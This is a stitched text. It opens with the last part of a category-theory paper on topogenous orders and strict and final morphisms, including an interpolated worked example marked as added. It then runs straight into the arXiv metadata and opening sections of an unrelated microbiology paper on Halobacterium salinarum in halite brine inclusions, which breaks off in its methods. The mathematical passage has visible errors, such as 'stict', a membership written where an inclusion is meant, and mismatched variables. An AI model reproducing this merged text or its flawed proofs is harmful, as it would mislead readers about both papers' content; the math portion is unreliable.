f\Rightarrow f.\ A\sqsubset_{Y}f.\ (B.\ f)\leq B\Rightarrow f.\ A\sqsubset_{Y}B.\) Let us recall from [16] the notion of a thick morphism which will help us to characterize \(\sqsubset\)-final morphisms. In a bounded form \(F\) over \(\mathcal{C}\), \(f:X\longrightarrow Y\in\mathcal{C}\) is a _thick morphism_ if \(f.\ 1^{X}=1^{Y}\). **Theorem 4.3**.: _Let \(F\) be a locally bounded form and \(\sqsubset\in\)TORD(\(F\)). 
Then, every \(\sqsubset\)-final morphism \(f:X\longrightarrow Y\) is thick provided \(1^{Y}\sqsubset 1^{Y}.\) The condition \(1^{Y}\sqsubset 1^{Y}\) can be dropped if \(\sqsubset\in\)MTORD(\(F\)). If \(F\) reflects retractions, then every retraction which is \(\sqsubset\)-final is \(\sqsubset\)-strict while if \(F\) reflects sections, every section that is \(\sqsubset\)-strict is \(\sqsubset\)-final._ Proof.: Since \(1^{Y}\sqsubset 1^{Y}\) and \(f\) is \(\sqsubset\)-final, \(1^{Y}\sqsubset 1^{Y}\Rightarrow 1^{Y}.\ f\sqsubset 1^{Y}.\ f\Rightarrow 1^{Y}.\ f\sqsubset 1^{X}\leq(f.\ 1^{X}).\ f\Rightarrow 1^{Y}.\ f\sqsubset(f.\ 1^{X}).\ f\Rightarrow 1^{Y}\sqsubset f.\ 1^{X}\Rightarrow 1^{Y}\leq f.\ 1^{X}=1^{Y}\). It is clear that if \(\sqsubset\in\)MTORD(\(F\)), then \(1^{Y}\sqsubset 1^{Y}\) can be dropped because \(1^{Y}\sqsubset 1^{Y}\Leftrightarrow C^{\sqsubset}(1^{Y})=1^{Y}\). Assume \(F\) reflects retractions and \(f\) is a retraction that is \(\sqsubset\)-final. Then, by Lemma 3.1, \(A\sqsubset_{X}B\Leftrightarrow(f.\ A).\ f\sqsubset(f.\ B).\ f\Leftrightarrow f.\ A\sqsubset f.\ B\). Lastly, let \(F\) reflect sections and \(f\) be a section which is \(\sqsubset\)-strict. Then, by Lemma 3.1, \(B.\ f\sqsubset_{X}B^{\prime}.\ f\Rightarrow f.\ (B.\ f)\sqsubset f.\ (B^{\prime}.\ f)\Rightarrow B\sqsubset B^{\prime}.\) **Proposition 4.4**.: _Let \(\sqsubset\) be a topogenous order on \(F\). If \(F\) reflects isomorphisms, then the class of \(\sqsubset\)-strict (resp. \(\sqsubset\)-final) morphisms contains all isomorphisms of \(\mathcal{C}\). The class of \(\sqsubset\)-strict (resp. \(\sqsubset\)-final) morphisms is closed under composition. If \(F\) reflects retractions, \(g\circ f\) is a \(\sqsubset\)-strict (resp. \(\sqsubset\)-final) morphism, and \(f\) is a retraction, then \(g\) is a \(\sqsubset\)-strict (resp. \(\sqsubset\)-final) morphism. Dually, if \(F\) reflects sections, \(g\circ f\) is a \(\sqsubset\)-strict (resp. \(\sqsubset\)-final) morphism, and \(g\) is a retraction, then \(f\) is \(\sqsubset\)-strict (resp. \(\sqsubset\)-final)._ Proof.: Assume that \(f\) is an isomorphism with inverse \(g\). Since \(F\) reflects isomorphisms, by Lemmas 3.1 and 2.1, we have that \(A\sqsubset B.\ f\Rightarrow f.\ A=A.\ g\sqsubset(B.\ f).\ g=B.\ (f\circ g)=B.\ 1_{Y}=B\) for any \(A\in\ F^{-1}X\) and \(B\in\ F^{-1}Y\). If \(f:X\longrightarrow Y\) and \(g:Y\longrightarrow Z\) are \(\sqsubset\)-strict, then by Lemma 2.1, \(A\sqsubset B.\ (g\circ f)=(B.\ g).\ f\Leftrightarrow f.\ A\sqsubset B.\ g\Leftrightarrow(g\circ f).\ A=g.\ (f.\ A)\sqsubset B.\) Let \(f\) be a retraction and \(g\circ f\) \(\sqsubset\)-strict. Since \(F\) reflects retractions, by Lemmas 3.1 and 2.1, \(A\sqsubset B.\ g\Rightarrow A.\ f\sqsubset(B.\ g).\ f=B.\ (g\circ f)\Rightarrow(g\circ f).\ (A.\ f)\sqsubset B\Leftrightarrow g.\ [f.\ (A.\ f)]\sqsubset B\Leftrightarrow g.\ A\sqsubset B.\) Let \(f\) be a section and \(g\circ f\) \(\sqsubset\)-strict. Since \(F\) reflects sections, by Lemmas 3.1 and 2.1, \(A\sqsubset B.\ f=[(g.\ B).\ g].\ f=(g.\ B).\ (g\circ f)\Rightarrow g.\ (f.\ A)\sqsubset g.\ B\Rightarrow f.\ A\sqsubset(g.\ B).\ g\Rightarrow f.\ A\sqsubset B\). A similar reasoning can be applied for the case of \(\sqsubset\)-final. Taking into consideration Propositions 3.3 and 3.2 and the fact that for any morphism \(f:X\longrightarrow Y\) in \(\mathcal{C}\) cocartesian (resp. cartesian) liftings of \(f\) at any \(A\in F^{-1}X\) (resp. 
\(B\in F^{-1}Y\)) exist, we obtain the following result. **Proposition 4.5**.: _Let \(\sqsubset\) be a topogenous order on \(F\), \(f:X\longrightarrow Y\) a \(\mathcal{C}\)-morphism and assume that \(\sqsubset\)\(\in\)JTORD(\(F\)). Then \(f\) is \(\sqsubset\)-stict if \(I^{\sqsubset}\) preserves domains of cartesian liftings of \(f\), i.e. \(I^{\sqsubset}(B).\)\(f=I^{\sqsubset}_{X}(B.\)\(f)\) for any \(B\in F^{-1}Y\). Similarly, if \(\sqsubset\)\(\in\)MTORD(\(F\)), then \(f\) is \(\sqsubset\)-strict if and only if \(C^{\sqsubset}\) preserves codomains of cocartesian liftings of \(f\), i.e. \(f.\)\(C^{\sqsubset}_{X}(A)=C^{\sqsubset}_{X}(f.\)\(A)\) for any \(A\in F^{-1}X\)._ Let \(\mathcal{C}\) be finitely cocomplete (so that pushouts of \(\mathcal{E}\)-morphisms along arbirary \(\mathcal{C}\)-morphisms exist and are in \(\mathcal{E}\)) with a proper \((\mathcal{E},\mathcal{M})\)-factorization structure for morphisms. Let \(F\) be the domain functor \(dom:\mathcal{E}\longrightarrow\mathcal{C}\). For any \(X\in\mathcal{C}\), \(F^{-1}X\) is the preordered class of \(\mathcal{E}\)-quotients of \(X\). For any \(\mathcal{C}\)-morphism \(f:X\longrightarrow Y\) and \(e\in F^{-1}X\), \(f.\)\(e\) is the pushout of \(e\) along \(f\) while \(d.\)\(f\) is the \(\mathcal{E}\)-part of the \((\mathcal{E},\mathcal{M})\)-factorization of \(d\circ f\) for any \(d\in F^{-1}Y\). **Definition 4.2**.: A topogenous order \(\sqsubset\) on \(F\) is said to be _cohereditary_ if for any retraction \(f:X\longrightarrow Y\) and any \(A,B\in F^{-1}Y\), \(B.\)\(f\sqsubset_{X}A.\)\(f\Rightarrow B\sqsubset_{Y}A\). Equivalently, \(\sqsubset\) is said to be _cohereditary_ if every retraction is \(\sqsubset\)-final. When \(\sqsubset\in\)JTORD\((F)\), \(\sqsubset\) is cohereditary if and only if \(C^{\sqsubset}_{Y}(B)=f.\)\(C^{\sqsubset}_{X}(B.\)\(f)\) for any retraction in \(\mathcal{C}\). It was observed in [6] that there is an order reversing isomorphism between the poset of full \(\mathcal{E}\)-reflective replete subcategories of \(\mathcal{C}\) and the poset of cohereditary idempotent closure operators on the form of \(\mathcal{E}\)-quotient. This result together with Proposition 3.2 permit to affirm that _there is an order reversing isomorphism between the poset of full \(\mathcal{E}\)-reflective replete subcategories of \(\mathcal{C}\) and the conglomerate of all cohereditary and interpolative topogenous orders on the form of \(\mathcal{E}\)-quotients in \(\mathcal{C}\) satisfying condition (TM)_. ## 5 Some examples **I**. Let \(F\) be the forgetful functor from **Top** to **Set**. For every \(X\in\textbf{Set}\), \(F^{-1}X\) is the complete lattice of all topologies on \(X\). If \(f:X\longrightarrow Y\) is a function in **Set**, \(f.\)\(\mathcal{T}_{X}\) is the final topology on \(Y\) induced by \(f\) for all \(\mathcal{T}_{X}\in F^{-1}X,\) and \(\mathcal{T}_{Y}.\)\(f\) is the initial topology on \(X\) induced by \(f\) for all \(\mathcal{T}_{Y}\in F^{-1}Y\). \(F\) is a bounded form in which \(\mathcal{T}_{Y}.\)\(f\) and \(f.\)\(\mathcal{T}_{X}\) exist for any \(\mathcal{T}_{X}\in F^{-1}X\) and \(\mathcal{T}_{Y}\in F^{-1}Y\). Let \(\mathcal{T}_{X},\mathcal{T^{\prime}}_{X}\in F^{-1}X.\) \((a)\) Putting \(\mathcal{T}_{X}\sqsubset_{X}\mathcal{T^{\prime}}_{X}\Leftrightarrow\theta( \mathcal{T}_{X})\leq_{X}\mathcal{T^{\prime}}_{X},\) where \(\theta(\mathcal{T}_{X})\) is the \(\theta\)-topology generated by \(\mathcal{T}_{X}\), we get a topogenous order on \(F\). 
\((T1)\) and \((T2)\) follow from the fact that \(\theta(\mathcal{T}_{X})\leq_{X}\mathcal{T^{\prime}}_{X}\Leftrightarrow\mathcal{ T^{\prime}}_{X}\subseteq\theta(\mathcal{T}_{X})\). For \((T3)\), let \(f:X\longrightarrow Y\) and \(\mathcal{T}_{Y},\mathcal{T^{\prime}}_{Y}\in F^{-1}Y\). Assume that \(\mathcal{T^{\prime}}_{Y}\subseteq\theta(\mathcal{T}_{Y})\) and \(A\in\mathcal{T^{\prime}}_{Y}\). \(f\). Then there is \(O^{\prime}\in\mathcal{T^{\prime}}_{Y}\) such that \(A=f^{-1}(O^{\prime})\) and \(O^{\prime}\in\theta(\mathcal{T}_{Y})\) by the assumption. Let \(y\in A\). Then \(f(y)\in O\) and so there is \(U\in\mathcal{U}_{f(y)}\) with \(U\) closed and \(U\subseteq O\). This implies that \(f^{-1}(U)\subseteq f^{-1}(O)=A\) and \(f^{-1}(U)\in\mathcal{U}_{Y}\). Consequently \(A\in\theta(\mathcal{T}_{Y}.\)\(f)\), i.e. \(\mathcal{T^{\prime}}_{Y}.\)\(f\subseteq\theta(\mathcal{T}_{Y}.\)\(f)\). It is easy to see that \(\sqsubset\in MTORD(F)\). **Proposition 5.1**.: _A function \(f:X\longrightarrow Y\) is \(\sqsubset\)-strict if it is surjective and for any \(\mathcal{T}_{X}\in F^{-1}X\) and \(\mathcal{T}_{Y}\in F^{-1}Y\), \(f:(X,\mathcal{T}_{X})\longrightarrow(Y,\mathcal{T}_{Y})\) is clopen. Every surjective function \(f:X\longrightarrow Y\) is \(\sqsubset\)- final._ Proof.: Assume \(\mathcal{T}_{Y}.\)\(f\subseteq\theta(\mathcal{T}_{X})\) and \(A\in\mathcal{T}_{Y}\). If \(y\in A\), then by surjectivity of \(f\), there is \(x\in f^{-1}(A)\) such that \(f(x)=y\) and \(f^{-1}(A)\in\mathcal{T}_{Y}.\)\(f\). By assumption, there are \(O\in\mathcal{T}_{X}\) and \(U\) closed in \(\mathcal{T}_{X}\) such that \(x\in O\subseteq U\subseteq f^{-1}(A)\). Since \(f\) is clopen, \(f(O)\in\mathcal{T}_{Y}\) and \(f(U)\) is closed in \(\mathcal{T}_{Y}\). We have \(f(x)=y\in f(O)\subseteq f(U)\in A\). Thus \(A\in\theta(f.\)\(\mathcal{T}_{X})\), that is \(\mathcal{T}_{Y}\subseteq\theta(f.\)\(\mathcal{T}_{X})\). Consequently \(f\) is \(\sqsubset\)-strict. Assume that \(\mathcal{T^{\prime}}_{Y}.\)\(f\subseteq\theta(\mathcal{T}_{Y}.\)\(f)\) and \(A\in\mathcal{T^{\prime}}_{Y}.\) Let \(x\in A\). Since \(f\) is surjective, there is \(x\in f^{-1}(A)\) such that \(y=f(x)\) and \(f^{-1}(A)\in\mathcal{T^{\prime}}_{Y}.\)\(f\). By the assumption, \(f^{-1}(A)\in\theta(\mathcal{T}_{Y}.\)\(f)\) and so there are open \(O\in\mathcal{T}_{Y}.\)\(f\) and closed \(U\) in \(\mathcal{T}_{Y}.\)\(f\) such that \(x\in O\subseteq U\subseteq f^{-1}(A)\). Now, \(O=f^{-1}(O^{\prime})\) and \(U=f^{-1}(U^{\prime})\) with \(O^{\prime}\in\mathcal{T}_{Y}\) and \(U^{\prime}\) closed in \(\mathcal{T}_{Y}\). We get that \(f(x)\in O^{\prime}\subseteq U^{\prime}\subseteq A\). Thus \(A\in\theta(\mathcal{T}_{Y})\) and \(\mathcal{T^{\prime}}_{Y}\subseteq\theta(\mathcal{T}_{Y})\). \((b)\) Putting \({\cal T}_{X}\sqsubset_{X}{\cal T}^{\prime}{}_{X}\Leftrightarrow{\cal T}_{X} \leq_{X}b({\cal T}^{\prime}{}_{X})\), where \(b({\cal T}^{\prime}{}_{X})\) is the \(b\)-topology generated by \({\cal T}^{\prime}{}_{X}\), is a topogenous order on \(F\). \((T1)\) and \((T2)\) follow from the fact that \({\cal T}_{X})\leq_{X}b({\cal T}^{\prime}{}_{X})\Leftrightarrow b({\cal T}^{ \prime}{}_{X})\subseteq{\cal T}_{X}\). For \((T3)\), let \(f:X\longrightarrow Y\in{\bf Set}\) and \({\cal T}_{X}\in F^{-1}X\), \({\cal T}_{Y}\in F^{-1}Y\). Assume that \(b({\cal T}_{Y})\subseteq f.\)\({\cal T}_{X}\) and \(A\in{\cal T}_{Y}.\)\(f.\) Then, there is \(O\in{\cal T}_{Y}\) such that \(A=f^{-1}(O)\). 
Since \({\cal T}_{Y}\subseteq b({\cal T}_{Y})\), \(O\in b({\cal T}_{Y})\) and by the assumption, \(O\in f.\)\({\cal T}_{X}\) which implies that \(A\in{\cal T}_{X}\) and \(A\in b({\cal T}_{X})\). Thus \({\cal T}_{Y}.\)\(f\subseteq b({\cal T}_{X})\). Clearly, \(\sqsubset\in JTORD(F).\) **Proposition 5.2**.: _Every function \(f:X\longrightarrow Y\) is \(\sqsubset\) strict (resp. \(\sqsubset\)-final)._ Proof.: Assume that \(b({\cal T}^{\prime}{}_{X})\subseteq{\cal T}_{X}\) and \(A\in b(f.{\cal T}^{\prime}{}_{X})\). If \(x\in f^{-1}(A)\), then \(f(x)\in A\) and there are \(O\in f.\)\({\cal T}^{\prime}{}_{X}\) and \(F\in f.\)\({\cal T}_{X}\) such that \(f(x)\in O\cap F\subseteq A.\) Now, \(f^{-1}(O)\in{\cal T}^{\prime}{}_{X}\) and \(f^{-1}(F)\) is closed in \({\cal T}^{\prime}{}_{X}\). We have that \(x\in f^{-1}(O\cap F)=f^{-1}(O)\cap f^{-1}(F))\subseteq f^{-1}(A)\). Since \(f^{-1}(O)\in{\cal T}^{\prime}{}_{X}\) and \(f^{-1}(F)\) is closed in \({\cal T}^{\prime}{}_{X}\), \(f^{-1}(A)\in b({\cal T}^{\prime}{}_{X})\) which implies that \(f^{-1}(A)\in{\cal T}_{X}\). Thus \(A\in b(f.{\cal T}_{X})\). Assume \(b({\cal T}^{\prime}{}_{Y}.\)\(f)\subseteq{\cal T}_{Y}.\)\(f\) for any \({\cal T}_{Y},{\cal T}^{\prime}{}_{Y}\in F^{-1}Y\) and \(A\in b({\cal T}^{\prime}{}_{Y})\). Let \(x\in f^{-1}(A)\). Then \(f(x)\in A\) and there are \(O\in{\cal T}^{\prime}{}_{Y}\) and \(F\) closed in \({\cal T}^{\prime}{}_{Y}\) such that \(f(x)\in O\cap F\subseteq A\). This implies that \(x\in f^{-1}(O)\cap f^{-1}(F)\subseteq f^{-1}(A)\). Thus \(f^{-1}(A)\in b({\cal T}^{\prime}{}_{Y}.\)\(f)\subseteq{\cal T}_{Y}.\)\(f\). **II**. Another example, somehow similar to the previous one, is the concrete functor \(F\) from **Qunif** to **Top** (where **Top** denotes the category of topological spaces and continuous maps and **Qunif**) denotes the category of quasi-uniform spaces and quasi-uniformly continuous maps. Then, for any \(X\in{\bf Top}\), \(F^{-1}X\) is the complete lattice of all quasi-uniform structures on \(X\) compatible with \({\cal T}\), known as _functorial quasi-uniform structures_. If \(f:X\longrightarrow Y\) is a continuous map and \({\cal U}_{Y}\in F^{-1}Y\), then \({\cal U}_{Y}.\)\(f\) is initial quasi-uniformity induced by \(f\) and \(f.\)\({\cal U}_{X}\) is the largest quasi-uniformity on \(Y\) for which \(f\) is quasi-uniformly continuous. For any \({\cal U}_{X},{\cal V}_{X}\in F^{-1}X\), putting \({\cal U}_{X}\sqsubset_{X}{\cal V}_{X}\Leftrightarrow{\cal U}_{X}\leq_{X}{\cal V }_{X}^{\star}\), where \({\cal V}_{X}^{\star}\) is the coarsest uniformity containing \({\cal V}_{X}\), we get a topogenous order on \(F\). **III**. Let \(F\) the form of subgroups (i.e injective group homomorphisms) with **Grp** the category of groups and group homomorphisms. Then, for any \(X\in{\bf Grp}\), \(F^{-1}X\) is the complete lattice of all subgroups of \(X\). It is also clear that this form is bounded and \(A.\)\(f\) and \(f.\)\(B\) exist for any \(A\in F^{-1}X\) and \(B\in F^{-1}Y.\) Now, define \(\sqsubset\) on \(F\) by \(A\sqsubset B\Leftrightarrow A\leq N\leq B\) with \(N\) a normal subgroup of \(X\). Then \(\sqsubset\) is a topogenous order on \(F\). A group homomorphism \(f:X\longrightarrow Y\) is \(\sqsubset\)-strict if and only if it preserves normal subgroups while \(f\) is \(\sqsubset\)-final if and only if it is surjective.
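As a small worked illustration of the last example (added here; it is not part of the original note), take \(X=S_{3}\), whose normal subgroups are \(\{e\}\), \(A_{3}\) and \(S_{3}\). With \(A\sqsubset B\Leftrightarrow A\leq N\leq B\) for some normal subgroup \(N\) of \(X\), one finds
\[\{e\}\sqsubset B\ \text{for every subgroup}\ B,\qquad A_{3}\sqsubset A_{3}\sqsubset S_{3},\qquad\langle(1\,2)\rangle\sqsubset B\ \text{only for}\ B=S_{3},\]
since the only normal subgroup of \(S_{3}\) containing a transposition is \(S_{3}\) itself; in particular \(\sqsubset\) is strictly contained in \(\leq\) on this fibre. By the characterization just stated, the inclusion \(A_{3}\hookrightarrow S_{3}\) is \(\sqsubset\)-strict (its subgroups \(\{e\}\) and \(A_{3}\) remain normal in \(S_{3}\)) but not \(\sqsubset\)-final, since it is not surjective.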
2305.11904
Molecular acclimation of Halobacterium salinarum to halite brine inclusions
Halophilic microorganisms have long been known to survive within the brine inclusions of salt crystals, as evidenced by the change in color for salt crystals containing pigmented halophiles. However, the molecular mechanisms allowing this survival has remained an open question for decades. While protocols for the surface sterilization of halite (NaCl) have enabled isolation of cells and DNA from within halite brine inclusions, "-omics" based approaches have faced two main technical challenges: (1) removal of all contaminating organic biomolecules (including proteins) from halite surfaces, and (2) performing selective biomolecule extractions directly from cells contained within halite brine inclusions with sufficient speed to avoid modifications in gene expression during extraction. In this study, we tested different methods to resolve these two technical challenges. Following this method development, we then applied the optimized methods to perform the first examination of the early acclimation of a model haloarchaeon (Halobacterium salinarum NRC-1) to halite brine inclusions. Examinations of the proteome of Halobacterium cells two months post-evaporation revealed a high degree of similarity with stationary phase liquid cultures, but with a sharp down-regulation of ribosomal proteins. While proteins for central metabolism were part of the shared proteome between liquid cultures and halite brine inclusions, proteins involved in cell mobility (archaellum, gas vesicles) were either absent or less abundant in halite samples. Proteins unique to cells within brine inclusions included transporters, suggesting modified interactions between cells and the surrounding brine inclusion microenvironment. The methods and hypotheses presented here enable future studies of the survival of halophiles in both culture model and natural halite systems.
C. Favreau, A. Tribondeau, M. Marugan, F. Guyot, B. Alpha-Bazin, A. Marie, R. Puppo, T. Dufour, A. Huguet, S. Zirah, A. Kish
2023-05-16T21:49:51Z
http://arxiv.org/abs/2305.11904v1
# Molecular acclimation of Halobacterium salinarum to halite brine inclusions ###### Abstract Halophilic microorganisms have long been known to survive within the brine inclusions of salt crystals, as evidenced by the change in color for salt crystals containing pigmented halophiles. However, the molecular mechanisms allowing this survival has remained an open question for decades. While protocols for the surface sterilization of halite (NaCl) have enabled isolation of cells and DNA from within halite brine inclusions, "-omics" based approaches have faced two main technical challenges: (1) removal of all contaminating organic biomolecules (including proteins) from halite surfaces, and (2) performing selective biomolecule extractions directly from cells contained within halite brine inclusions with sufficient speed to avoid modifications in gene expression during extraction. In this study, we tested different methods to resolve these two technical challenges. Following this method development, we then applied the optimized methods to perform the first examination of the early acclimation of a model haloarchaeon (Halobacterium salinarum NRC-1) to halite brine inclusions. Examinations of the proteome of Halobacterium cells two months post-evaporation revealed a high degree of similarity with stationary phase liquid cultures, but with a sharp down-regulation of ribosomal proteins. While proteins for central metabolism were part of the shared proteome between liquid cultures and halite brine inclusions, proteins involved in cell mobility (archaeulum, gas vesicles) were either absent or less abundant in halite samples. Proteins unique to cells within brine inclusions included transporters, suggesting modified interactions between cells and the surrounding brine inclusion microenvironment. The methods and hypotheses presented here enable future studies of the survival of halophiles in both culture model and natural halite systems. Keywords:Halobacterium, halophile, LC-MS, proteomics, halite (NaCl) + Footnote †: journal: _The document is an author-edited version of the original article while presenting identical scientific content_ ## 1 Introduction Extremely halophilic archaea are adapted to the highest possible salinity conditions, thriving in saturated brines. Microbial diversity in such environments is highly reduced and tends to be dominated by haloarchae (Oren, 2006). Saturated brines are characterized by a low dissolved oxygen content at the surface despite their contact with air (Sherwood et al., 1991). The surface of saturated brines is often exposed to high temperatures and high levels of solar radiation (Oren, 2006; Merino et al., 2019), which can lead to evaporation. During evaporation events, the total contents of the brine, including salts, organics, some atmospheric gases, and any microorganisms present, are trapped within inclusions in the salt crystals. Viable halophilic bacteria and archaea have been isolated from halite (NaCl) of various ages, from months to years (Norton and Grant, 1988; Gramain et al., 2011; Huby et al., 2020), to geologically relevant timescales with the age of the primary halite given by the surrounding geological matrix. Some studies have even reported the observation or isolation of microorganisms from halite dated to several hundreds of millions of years (Vreeland et al., 2000; Schreder-Gomes et al., 2022). These observations have raised two important questions: (1) are these truly "ancient" cells? 
(2) what physiological changes are required for microbial cells to remain viable within halite brine inclusions? The first question has been studied in greater detail, and while many questions still remain, these studies provided valuable insights into the potential for contamination by surface-associated microorganisms (Graur and Pupko, 2001; Maughan et al., 2002; Nickle et al., 2002). In response to these criticisms, appropriate surface sterilization and cleaning procedures for microbial cultivation and DNA isolation for micro-biodiversity studies from dissolved ancient halite (Gramain et al., 2011; Sankaranarayanan et al., 2011) were developed. These approaches enabled more accurate identification of only those microorganisms trapped within halite inclusions. Another open question is whether the age determined from the geological context in which primary halite crystals were found can accurately be applied directly to the microorganisms in the brine inclusions (Hazen and Roedder, 2001). Dissolution and recrystallization of halite over geological time scales may contribute to the presence of more modern microorganisms (see discussion in Winters et al., 2015 and references therein). No known microbial survival mechanism to date can account for cell viability over millions of years. Some studies have examined the possibility that microbial cell-like biomorphs are preserved within brine inclusions (Nims et al., 2021). An alternative approach is to experimentally confirm how microbial life is supported within brine inclusions over durations known to support viable microorganisms. Determining the cellular functions expressed by viable halophiles within halite brine inclusions requires the direct isolation of biomolecules such as proteins and nucleic acids for "-omics" analyses, including proteomics and transcriptomics. However, significant technical challenges are presented by the closed system of brine inclusions within halite. Accessing the contents of brine inclusions by rapid crystal dissolution leads to cell lysis by osmotic shock and biomolecule degradation, while the time required for gradual crystal dissolution preserving cellular integrity is also sufficient for alterations in the transcriptomes and proteomes of viable cells away from their state within the brine inclusions. In addition, the direct extraction of biomolecules from brine inclusions involves a large amount of NaCl, which is incompatible with direct mass spectrometry analysis due to the lack of sufficient desalination steps in standard protocols. Although current hypotheses concerning the modifications of halophile physiology during entrapment within halite brine inclusions include a change to anaerobic metabolism (Winters et al., 2015) along with the potential for cell envelope modifications depending on conditions (Fendrihan et al., 2012; Kixmüller and Greie, 2012), these remain largely unverified at the molecular level due to these experimental challenges. New methods are needed to isolate proteins and other biomolecules directly from halite brine inclusions, without allowing the microorganisms to alter their gene expression during salt dissolution and processing. The development of a new analytical workflow compatible with "-omics" analyses is best conducted with a known model organism for which there is a large repertoire of physiological studies and multi-omics data for liquid cultures exposed to a range of conditions applicable to halite brine inclusions (different oxygen availabilities, salinities, nutrient availabilities, etc.). 
For these reasons, we chose the model haloarchaeon _Halobacterium salinarum_, the type strain of the Halobacteriales family (Gruber et al., 2004; Oren et al., 2009). _Halobacterium salinarum_ is an appropriate model as it is found in contemporary NaCl-saturated aqueous environments such as Great Salt Lake (Post, 1977), has been detected in halite, and is closely related to isolates from ancient salt deposits (Mormile et al., 2003). The red pigmentation of the _H. salinarum_ strain is directly correlated with transmembrane proteins (bacteriorhodopsin and halorhodopsin) and carotenoids (bacterioruberin) also used by cells as antioxidants (Eichler, 2019). The accumulation of high intracellular concentrations of potassium (K\({}^{+}\)) and chloride (Cl\({}^{-}\)) (Engel and Catchpole, 2005), needed to maintain osmotic homeostasis, induces both biochemical adaptations (in the form of a strongly acidic proteome) and technical challenges for desalting cellular extracts. _Halobacterium salinarum_ survives in changing environments by using a complex, variable energetic metabolism with a preference for aerobic respiration, but it is capable of switching to phototrophy via bacteriorhodopsin, arginine fermentation, or anaerobic respiration using dimethyl sulfoxide (DMSO) and trimethylamine oxide (TMAO) if available (Hartmann et al., 1980; Muller and DasSarma, 2005; Falb et al., 2008; Gonzalez et al., 2009). This type of switch occurs under low oxygen conditions such as during increasing salinity linked to water evaporation. Moreover, according to Orellana et al. (2013), _H. salinarum_ also seems to be able to use glycerol derived from microalgae of the genus _Dunaliella_ as a source of carbon under certain specific conditions (in liquid co-culture with viable _Dunaliella_ under high illumination over a set diurnal cycle and nitrate-limiting conditions). Established multi-omics protocols for liquid cultures of _H. salinarum_ have permitted analyses of the cellular responses to a broad range of environmental conditions, including variations in NaCl (Leuko et al., 2009), pH (Moran-Reyna and Coker, 2014), oxygen (Schmid et al., 2007), and temperature (Coker et al., 2007), all relevant to halite brine inclusions. This existing knowledge base far exceeds that developed to date for halophiles isolated directly from ancient halite. Here we present an efficient new analytical method for the study of microorganisms within halite, validated using _H. salinarum_ entrapped in laboratory-grown halite to probe the question of what physiological changes are required for microbial cells to remain viable within halite brine inclusions, focusing on the initial phase of halite entrapment. The developed workflow includes removal of not only surface-attached cells and nucleic acids but also proteins, with subsequent extraction and desalting of proteins directly from brine inclusions compatible with mass spectrometry analyses. Applying these methods, we determined the acclimation of _H. salinarum_ cells to inclusions at the molecular level within laboratory-grown halite by analyzing the differences in the expressed proteome prior to evaporation and 2 months after culture evaporation. Analyses focused on the characterization of cellular activity compared to stationary cells not trapped within halite, as well as the interactions of cells with the halite brine inclusion environment. ## 2 Materials and methods All reagents used were analytical grade and suitable for molecular biology. 
### Strain and culture conditions _Halobacterium salinarum_ strain NRC-1 (JCM 11081) was grown under oxic conditions in autoclaved complex medium (CM: 4.28 M NaCl, 81 mM MgSO\({}_{4}\)·7H\({}_{2}\)O, 27 mM KCl, 10 mM trisodium citrate·2H\({}_{2}\)O, 1% (w/w) peptone Oxoid® LP0034, pH adjusted to 7.4) following Oesterhelt and Stoeckenius (1974) at 37\({}^{\circ}\)C, 180 rpm, in glassware washed and then rinsed multiple times in MilliQ® water with vigorous shaking to remove all traces of detergents that can inhibit the growth of haloarchaea. Growth was monitored by spectrophotometry at 600 nm (OD\({}_{600}\)). Cultures for crystallizations and protein extractions were grown to stationary phase (OD\({}_{600}\) = 1.0-1.6), avoiding decline phase, to approximate the physiological condition of haloarchaea under natural conditions during evaporation. ### Laboratory-grown halite #### 2.2.1 Internally inoculated halite Modeling the entrapment of haloarchaea within halite has previously been done in the laboratory by Norton and Grant (1988), Gramain et al. (2011) and Kixmüller and Greie (2012). In this study, laboratory-grown halite crystals were produced following a modified version of the protocols of Fendrihan et al. (2012), by adding nutrients to their Tris-buffered NaCl solution (TN buffer; 100 mM Tris-HCl pH 7.4, 4.28 M NaCl) to simulate organic matter and nutrients in the natural environment just prior to halite precipitation (Winters et al., 2015). Briefly, _H. salinarum_ cells in stationary growth phase were harvested by centrifugation at 7,500g, 10 min, 20\({}^{\circ}\)C and the growth medium removed by washing with sterile TN buffer. Cells were then resuspended in sterile TNPA buffer (TN buffer with 1% (w/v) Oxoid® peptone LP0034 and 0.5% (w/v) L-Arg HCl, adjusted to pH 7.4) with a ratio of 10 mL TNPA buffer per 500 mg of cells (wet weight, equal to \(9.6\times 10^{11}\) cells). Then 20 mL of TNPA crystallization buffer containing \(3.2\times 10^{11}\) cells was evaporated in each sterile 90/14.3 mm Petri dish at 37\({}^{\circ}\)C with a 12 h:12 h light:dark photoperiod (66.75 µmol photons·m\({}^{-2}\)·s\({}^{-1}\), verified by a Li-250A, Li-Cor Inc., Germany) to model natural brine surfaces. Complete evaporation and drying of the precipitated halite were obtained after ~22 days, followed by a further 60 days (2 months) of incubation to study the early phase of _H. salinarum_ entrapment within halite brine inclusions. #### 2.2.2 Externally inoculated halite To produce halite with _H. salinarum_ cells localized exclusively at the halite surface, 20 mL of sterile TN buffer was first evaporated as described above until complete drying (~22 days). The resultant crystals were then collected aseptically using sterilized forceps and the surfaces of each crystal inoculated with \(9\times 10^{9}\) _H. salinarum_ cells in stationary phase, applied as a highly concentrated cell suspension after centrifugation (7,500g, 10 min, room temperature (RT)). Crystals were inoculated on the largest faces (designated here as "top" and "bottom") by first inoculating the "top" face with \(4.5\times 10^{9}\) cells drop-by-drop and spreading out using a sterile inoculating loop. Crystals were then dried overnight at 37\({}^{\circ}\)C, and the "bottom" face was inoculated the next day using the same protocol. ### Scanning electron microscopy Observations and analyses of halite crystals were performed by first attaching the crystals directly to aluminum supports with carbon tape followed by carbon thin coating. 
Observations were performed using a Zeiss Ultra 55 field emission gun scanning electron microscope (SEM-FG) equipped with a Bruker energy dispersive X-ray spectroscopy (EDX) QUANTUM detector. Secondary and backscattered electron images and EDX analyses and maps were obtained at 10 kV and a working distance of 7.5 mm. ### Post-evaporation cellular viability tests To assess cell viability after halite inclusion, salt crystals were weighed to determine the appropriate NaCl concentration required for the complex medium to obtain a final concentration of 4.28 M after halite dissolution, as previously described by Gramain et al. (2011). Halite and complex medium were then incubated at 37\({}^{\circ}\)C, 180 rpm. After crystal dissolution, culture OD\({}_{600}\) was measured by spectrophotometry. Pigmented (red) cultures reaching a normal stationary phase (OD\({}_{600}\) \(>\) 1.0) were classified as viable and cultures showing no increase in OD\({}_{600}\) after 1 month (OD\({}_{600}\) \(<\) 0.1) were classified as non-viable. ### Halite surface cleaning (removal of cells and proteins) #### 2.5.1 Cold atmospheric plasma treatment Cold atmospheric plasmas 